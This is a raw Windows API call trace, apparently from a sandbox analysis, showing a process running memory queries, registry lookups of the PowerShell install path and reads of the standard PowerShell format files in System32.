	[0313.902] VirtualQuery (in: lpAddress=0x28be90, lpBuffer=0x28cd50, dwLength=0x30 | out: lpBuffer=0x28cd50*(BaseAddress=0x28b000, AllocationBase=0x210000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0313.902] VirtualQuery (in: lpAddress=0x28be90, lpBuffer=0x28cd50, dwLength=0x30 | out: lpBuffer=0x28cd50*(BaseAddress=0x28b000, AllocationBase=0x210000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0313.903] VirtualQuery (in: lpAddress=0x28be90, lpBuffer=0x28cd50, dwLength=0x30 | out: lpBuffer=0x28cd50*(BaseAddress=0x28b000, AllocationBase=0x210000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0313.903] VirtualQuery (in: lpAddress=0x28be90, lpBuffer=0x28cd50, dwLength=0x30 | out: lpBuffer=0x28cd50*(BaseAddress=0x28b000, AllocationBase=0x210000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0313.903] VirtualQuery (in: lpAddress=0x28be90, lpBuffer=0x28cd50, dwLength=0x30 | out: lpBuffer=0x28cd50*(BaseAddress=0x28b000, AllocationBase=0x210000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0313.904] VirtualQuery (in: lpAddress=0x28be90, lpBuffer=0x28cd50, dwLength=0x30 | out: lpBuffer=0x28cd50*(BaseAddress=0x28b000, AllocationBase=0x210000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0313.904] VirtualQuery (in: lpAddress=0x28be90, lpBuffer=0x28cd50, dwLength=0x30 | out: lpBuffer=0x28cd50*(BaseAddress=0x28b000, AllocationBase=0x210000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0313.904] VirtualQuery (in: lpAddress=0x28be90, lpBuffer=0x28cd50, dwLength=0x30 | out: lpBuffer=0x28cd50*(BaseAddress=0x28b000, AllocationBase=0x210000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0313.904] VirtualQuery (in: lpAddress=0x28be90, lpBuffer=0x28cd50, dwLength=0x30 | out: lpBuffer=0x28cd50*(BaseAddress=0x28b000, AllocationBase=0x210000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0313.905] VirtualQuery (in: lpAddress=0x28be90, lpBuffer=0x28cd50, dwLength=0x30 | out: lpBuffer=0x28cd50*(BaseAddress=0x28b000, AllocationBase=0x210000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0313.905] VirtualQuery (in: lpAddress=0x28be90, lpBuffer=0x28cd50, dwLength=0x30 | out: lpBuffer=0x28cd50*(BaseAddress=0x28b000, AllocationBase=0x210000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0313.905] VirtualQuery (in: lpAddress=0x28be90, lpBuffer=0x28cd50, dwLength=0x30 | out: lpBuffer=0x28cd50*(BaseAddress=0x28b000, AllocationBase=0x210000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0313.905] VirtualQuery (in: lpAddress=0x28be90, lpBuffer=0x28cd50, dwLength=0x30 | out: lpBuffer=0x28cd50*(BaseAddress=0x28b000, AllocationBase=0x210000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0314.765] VirtualQuery (in: lpAddress=0x28be90, lpBuffer=0x28cd50, dwLength=0x30 | out: lpBuffer=0x28cd50*(BaseAddress=0x28b000, AllocationBase=0x210000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0314.767] VirtualQuery (in: lpAddress=0x28bea0, lpBuffer=0x28cd60, dwLength=0x30 | out: lpBuffer=0x28cd60*(BaseAddress=0x28b000, AllocationBase=0x210000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0314.767] VirtualQuery (in: lpAddress=0x28bea0, lpBuffer=0x28cd60, dwLength=0x30 | out: lpBuffer=0x28cd60*(BaseAddress=0x28b000, AllocationBase=0x210000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0314.767] VirtualQuery (in: lpAddress=0x28be90, lpBuffer=0x28cd50, dwLength=0x30 | out: lpBuffer=0x28cd50*(BaseAddress=0x28b000, AllocationBase=0x210000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0314.768] VirtualQuery (in: lpAddress=0x28be90, lpBuffer=0x28cd50, dwLength=0x30 | out: lpBuffer=0x28cd50*(BaseAddress=0x28b000, AllocationBase=0x210000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0314.801] VirtualQuery (in: lpAddress=0x28be90, lpBuffer=0x28cd50, dwLength=0x30 | out: lpBuffer=0x28cd50*(BaseAddress=0x28b000, AllocationBase=0x210000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0314.801] VirtualQuery (in: lpAddress=0x28be90, lpBuffer=0x28cd50, dwLength=0x30 | out: lpBuffer=0x28cd50*(BaseAddress=0x28b000, AllocationBase=0x210000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0314.802] VirtualQuery (in: lpAddress=0x28be90, lpBuffer=0x28cd50, dwLength=0x30 | out: lpBuffer=0x28cd50*(BaseAddress=0x28b000, AllocationBase=0x210000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0314.808] CoTaskMemAlloc (cb=0x104) returned 0xed3d0
	[0314.808] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0xed3d0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0314.808] CoTaskMemFree (pv=0xed3d0) 
	[0314.810] VirtualQuery (in: lpAddress=0x28be90, lpBuffer=0x28cd50, dwLength=0x30 | out: lpBuffer=0x28cd50*(BaseAddress=0x28b000, AllocationBase=0x210000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0315.451] VirtualQuery (in: lpAddress=0x28be90, lpBuffer=0x28cd50, dwLength=0x30 | out: lpBuffer=0x28cd50*(BaseAddress=0x28b000, AllocationBase=0x210000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0315.451] VirtualQuery (in: lpAddress=0x28be90, lpBuffer=0x28cd50, dwLength=0x30 | out: lpBuffer=0x28cd50*(BaseAddress=0x28b000, AllocationBase=0x210000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0315.452] VirtualQuery (in: lpAddress=0x28be90, lpBuffer=0x28cd50, dwLength=0x30 | out: lpBuffer=0x28cd50*(BaseAddress=0x28b000, AllocationBase=0x210000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0315.452] VirtualQuery (in: lpAddress=0x28be90, lpBuffer=0x28cd50, dwLength=0x30 | out: lpBuffer=0x28cd50*(BaseAddress=0x28b000, AllocationBase=0x210000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0315.452] VirtualQuery (in: lpAddress=0x28be90, lpBuffer=0x28cd50, dwLength=0x30 | out: lpBuffer=0x28cd50*(BaseAddress=0x28b000, AllocationBase=0x210000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0315.452] VirtualQuery (in: lpAddress=0x28be90, lpBuffer=0x28cd50, dwLength=0x30 | out: lpBuffer=0x28cd50*(BaseAddress=0x28b000, AllocationBase=0x210000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0315.453] VirtualQuery (in: lpAddress=0x28be90, lpBuffer=0x28cd50, dwLength=0x30 | out: lpBuffer=0x28cd50*(BaseAddress=0x28b000, AllocationBase=0x210000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0315.454] VirtualQuery (in: lpAddress=0x28be90, lpBuffer=0x28cd50, dwLength=0x30 | out: lpBuffer=0x28cd50*(BaseAddress=0x28b000, AllocationBase=0x210000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0315.455] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="SOFTWARE\\Microsoft\\PowerShell\\1\\ShellIds\\Microsoft.PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x28d348 | out: phkResult=0x28d348*=0x304) returned 0x0
	[0315.455] RegQueryValueExW (in: hKey=0x304, lpValueName="path", lpReserved=0x0, lpType=0x28d35c, lpData=0x0, lpcbData=0x28d358*=0x0 | out: lpType=0x28d35c*=0x1, lpData=0x0, lpcbData=0x28d358*=0x74) returned 0x0
	[0315.455] RegQueryValueExW (in: hKey=0x304, lpValueName="path", lpReserved=0x0, lpType=0x28d2cc, lpData=0x0, lpcbData=0x28d2c8*=0x0 | out: lpType=0x28d2cc*=0x1, lpData=0x0, lpcbData=0x28d2c8*=0x74) returned 0x0
	[0315.455] CoTaskMemAlloc (cb=0x78) returned 0xf5290
	[0315.455] RegQueryValueExW (in: hKey=0x304, lpValueName="path", lpReserved=0x0, lpType=0x28d29c, lpData=0xf5290, lpcbData=0x28d298*=0x74 | out: lpType=0x28d29c*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", lpcbData=0x28d298*=0x74) returned 0x0
	[0315.455] CoTaskMemFree (pv=0xf5290) 
	[0315.455] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", nBufferLength=0x105, lpBuffer=0x28d010, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpFilePart=0x0) returned 0x2a
	[0315.455] SetErrorMode (uMode=0x1) returned 0x1
	[0315.455] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0"), fInfoLevelId=0x0, lpFileInformation=0x28d220 | out: lpFileInformation=0x28d220*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x80093051, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x1dba44b2, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0x1dba44b2, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0x1000)) returned 1
	[0315.455] SetErrorMode (uMode=0x1) returned 0x1
	[0315.456] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Diagnostics.Format.ps1xml", nBufferLength=0x105, lpBuffer=0x28d010, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Diagnostics.Format.ps1xml", lpFilePart=0x0) returned 0x44
	[0315.456] SetErrorMode (uMode=0x1) returned 0x1
	[0315.456] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Diagnostics.Format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\diagnostics.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x28d220 | out: lpFileInformation=0x28d220*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x67d93418, ftCreationTime.dwHighDateTime=0x1ca03f8, ftLastAccessTime.dwLowDateTime=0x67d93418, ftLastAccessTime.dwHighDateTime=0x1ca03f8, ftLastWriteTime.dwLowDateTime=0xe5e03e37, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x69e2)) returned 1
	[0315.456] SetErrorMode (uMode=0x1) returned 0x1
	[0315.456] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\WSMan.format.ps1xml", nBufferLength=0x105, lpBuffer=0x28d010, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\WSMan.format.ps1xml", lpFilePart=0x0) returned 0x3e
	[0315.456] SetErrorMode (uMode=0x1) returned 0x1
	[0315.456] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\WSMan.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\wsman.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x28d220 | out: lpFileInformation=0x28d220*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x67f36317, ftCreationTime.dwHighDateTime=0x1ca03f8, ftLastAccessTime.dwLowDateTime=0x67f36317, ftLastAccessTime.dwHighDateTime=0x1ca03f8, ftLastWriteTime.dwLowDateTime=0xe6065417, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x5fb2)) returned 1
	[0315.457] SetErrorMode (uMode=0x1) returned 0x1
	[0315.457] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml", nBufferLength=0x105, lpBuffer=0x28d010, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml", lpFilePart=0x0) returned 0x44
	[0315.457] SetErrorMode (uMode=0x1) returned 0x1
	[0315.457] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\certificate.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x28d220 | out: lpFileInformation=0x28d220*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x67ddf6d2, ftCreationTime.dwHighDateTime=0x1ca03f8, ftLastAccessTime.dwLowDateTime=0x67ddf6d2, ftLastAccessTime.dwHighDateTime=0x1ca03f8, ftLastWriteTime.dwLowDateTime=0xe5dddcd9, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x6aca)) returned 1
	[0315.457] SetErrorMode (uMode=0x1) returned 0x1
	[0315.457] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\DotNetTypes.format.ps1xml", nBufferLength=0x105, lpBuffer=0x28d010, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\DotNetTypes.format.ps1xml", lpFilePart=0x0) returned 0x44
	[0315.457] SetErrorMode (uMode=0x1) returned 0x1
	[0315.457] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\DotNetTypes.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\dotnettypes.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x28d220 | out: lpFileInformation=0x28d220*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x67e0582f, ftCreationTime.dwHighDateTime=0x1ca03f8, ftLastAccessTime.dwLowDateTime=0x67e0582f, ftLastAccessTime.dwHighDateTime=0x1ca03f8, ftLastWriteTime.dwLowDateTime=0xe5e29f95, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x11bce)) returned 1
	[0315.457] SetErrorMode (uMode=0x1) returned 0x1
	[0315.457] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\FileSystem.format.ps1xml", nBufferLength=0x105, lpBuffer=0x28d010, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\FileSystem.format.ps1xml", lpFilePart=0x0) returned 0x43
	[0315.457] SetErrorMode (uMode=0x1) returned 0x1
	[0315.458] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\FileSystem.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\filesystem.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x28d220 | out: lpFileInformation=0x28d220*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x67e2b98c, ftCreationTime.dwHighDateTime=0x1ca03f8, ftLastAccessTime.dwLowDateTime=0x67e2b98c, ftLastAccessTime.dwHighDateTime=0x1ca03f8, ftLastWriteTime.dwLowDateTime=0xe5e76251, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x6119)) returned 1
	[0315.458] SetErrorMode (uMode=0x1) returned 0x1
	[0315.458] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Help.format.ps1xml", nBufferLength=0x105, lpBuffer=0x28d010, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Help.format.ps1xml", lpFilePart=0x0) returned 0x3d
	[0315.458] SetErrorMode (uMode=0x1) returned 0x1
	[0315.458] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Help.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\help.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x28d220 | out: lpFileInformation=0x28d220*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x67e51ae9, ftCreationTime.dwHighDateTime=0x1ca03f8, ftLastAccessTime.dwLowDateTime=0x67e51ae9, ftLastAccessTime.dwHighDateTime=0x1ca03f8, ftLastWriteTime.dwLowDateTime=0xe5e9c3af, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x3ef37)) returned 1
	[0315.458] SetErrorMode (uMode=0x1) returned 0x1
	[0315.458] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellCore.format.ps1xml", nBufferLength=0x105, lpBuffer=0x28d010, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellCore.format.ps1xml", lpFilePart=0x0) returned 0x47
	[0315.458] SetErrorMode (uMode=0x1) returned 0x1
	[0315.458] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellCore.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\powershellcore.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x28d220 | out: lpFileInformation=0x28d220*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x67e9dda3, ftCreationTime.dwHighDateTime=0x1ca03f8, ftLastAccessTime.dwLowDateTime=0x67e9dda3, ftLastAccessTime.dwHighDateTime=0x1ca03f8, ftLastWriteTime.dwLowDateTime=0xe601915b, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x15e67)) returned 1
	[0315.458] SetErrorMode (uMode=0x1) returned 0x1
	[0315.458] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellTrace.format.ps1xml", nBufferLength=0x105, lpBuffer=0x28d010, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellTrace.format.ps1xml", lpFilePart=0x0) returned 0x48
	[0315.459] SetErrorMode (uMode=0x1) returned 0x1
	[0315.459] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellTrace.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\powershelltrace.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x28d220 | out: lpFileInformation=0x28d220*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x67eea05d, ftCreationTime.dwHighDateTime=0x1ca03f8, ftLastAccessTime.dwLowDateTime=0x67eea05d, ftLastAccessTime.dwHighDateTime=0x1ca03f8, ftLastWriteTime.dwLowDateTime=0xe601915b, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x48b4)) returned 1
	[0315.459] SetErrorMode (uMode=0x1) returned 0x1
	[0315.459] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Registry.format.ps1xml", nBufferLength=0x105, lpBuffer=0x28d010, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Registry.format.ps1xml", lpFilePart=0x0) returned 0x41
	[0315.459] SetErrorMode (uMode=0x1) returned 0x1
	[0315.459] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Registry.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\registry.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x28d220 | out: lpFileInformation=0x28d220*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x67eea05d, ftCreationTime.dwHighDateTime=0x1ca03f8, ftLastAccessTime.dwLowDateTime=0x67eea05d, ftLastAccessTime.dwHighDateTime=0x1ca03f8, ftLastWriteTime.dwLowDateTime=0xe603f2b9, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x4e98)) returned 1
	[0315.459] SetErrorMode (uMode=0x1) returned 0x1
	[0315.460] CoTaskMemAlloc (cb=0x104) returned 0xed3d0
	[0315.460] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0xed3d0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0315.460] CoTaskMemFree (pv=0xed3d0) 
	[0315.463] CoTaskMemAlloc (cb=0x104) returned 0xed3d0
	[0315.463] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0xed3d0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0315.463] CoTaskMemFree (pv=0xed3d0) 
	[0315.463] CoTaskMemAlloc (cb=0x104) returned 0xed3d0
	[0315.463] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0xed3d0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0315.463] CoTaskMemFree (pv=0xed3d0) 
	[0315.464] CoTaskMemAlloc (cb=0x104) returned 0xed3d0
	[0315.464] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0xed3d0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0315.464] CoTaskMemFree (pv=0xed3d0) 
	[0315.464] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Diagnostics.Format.ps1xml", nBufferLength=0x105, lpBuffer=0x28c930, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Diagnostics.Format.ps1xml", lpFilePart=0x0) returned 0x44
	[0315.464] SetErrorMode (uMode=0x1) returned 0x1
	[0315.464] CreateFileW (lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Diagnostics.Format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\diagnostics.format.ps1xml"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x308
	[0315.464] GetFileType (hFile=0x308) returned 0x1
	[0315.465] SetErrorMode (uMode=0x1) returned 0x1
	[0315.465] GetFileType (hFile=0x308) returned 0x1
	[0315.465] ReadFile (in: hFile=0x308, lpBuffer=0x3205f10, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x28ceb8, lpOverlapped=0x0 | out: lpBuffer=0x3205f10*, lpNumberOfBytesRead=0x28ceb8*=0x1000, lpOverlapped=0x0) returned 1
	[0315.466] ReadFile (in: hFile=0x308, lpBuffer=0x3205f10, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x28ceb8, lpOverlapped=0x0 | out: lpBuffer=0x3205f10*, lpNumberOfBytesRead=0x28ceb8*=0x1000, lpOverlapped=0x0) returned 1
	[0315.466] ReadFile (in: hFile=0x308, lpBuffer=0x3205f10, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x28ceb8, lpOverlapped=0x0 | out: lpBuffer=0x3205f10*, lpNumberOfBytesRead=0x28ceb8*=0x1000, lpOverlapped=0x0) returned 1
	[0315.466] ReadFile (in: hFile=0x308, lpBuffer=0x3205f10, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x28ceb8, lpOverlapped=0x0 | out: lpBuffer=0x3205f10*, lpNumberOfBytesRead=0x28ceb8*=0x1000, lpOverlapped=0x0) returned 1
	[0315.466] ReadFile (in: hFile=0x308, lpBuffer=0x3205f10, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x28ceb8, lpOverlapped=0x0 | out: lpBuffer=0x3205f10*, lpNumberOfBytesRead=0x28ceb8*=0x1000, lpOverlapped=0x0) returned 1
	[0315.467] ReadFile (in: hFile=0x308, lpBuffer=0x3205f10, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x28ceb8, lpOverlapped=0x0 | out: lpBuffer=0x3205f10*, lpNumberOfBytesRead=0x28ceb8*=0x1000, lpOverlapped=0x0) returned 1
	[0315.467] ReadFile (in: hFile=0x308, lpBuffer=0x3205f10, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x28ceb8, lpOverlapped=0x0 | out: lpBuffer=0x3205f10*, lpNumberOfBytesRead=0x28ceb8*=0x9e2, lpOverlapped=0x0) returned 1
	[0315.467] ReadFile (in: hFile=0x308, lpBuffer=0x320545a, nNumberOfBytesToRead=0x21e, lpNumberOfBytesRead=0x28ceb8, lpOverlapped=0x0 | out: lpBuffer=0x320545a*, lpNumberOfBytesRead=0x28ceb8*=0x0, lpOverlapped=0x0) returned 1
	[0315.467] ReadFile (in: hFile=0x308, lpBuffer=0x3205f10, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x28ceb8, lpOverlapped=0x0 | out: lpBuffer=0x3205f10*, lpNumberOfBytesRead=0x28ceb8*=0x0, lpOverlapped=0x0) returned 1
	[0315.467] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Diagnostics.Format.ps1xml", nBufferLength=0x105, lpBuffer=0x28cc00, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Diagnostics.Format.ps1xml", lpFilePart=0x0) returned 0x44
	[0315.467] SetErrorMode (uMode=0x1) returned 0x1
	[0315.468] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Diagnostics.Format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\diagnostics.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x28ce60 | out: lpFileInformation=0x28ce60*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x67d93418, ftCreationTime.dwHighDateTime=0x1ca03f8, ftLastAccessTime.dwLowDateTime=0x67d93418, ftLastAccessTime.dwHighDateTime=0x1ca03f8, ftLastWriteTime.dwLowDateTime=0xe5e03e37, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x69e2)) returned 1
	[0315.468] SetErrorMode (uMode=0x1) returned 0x1
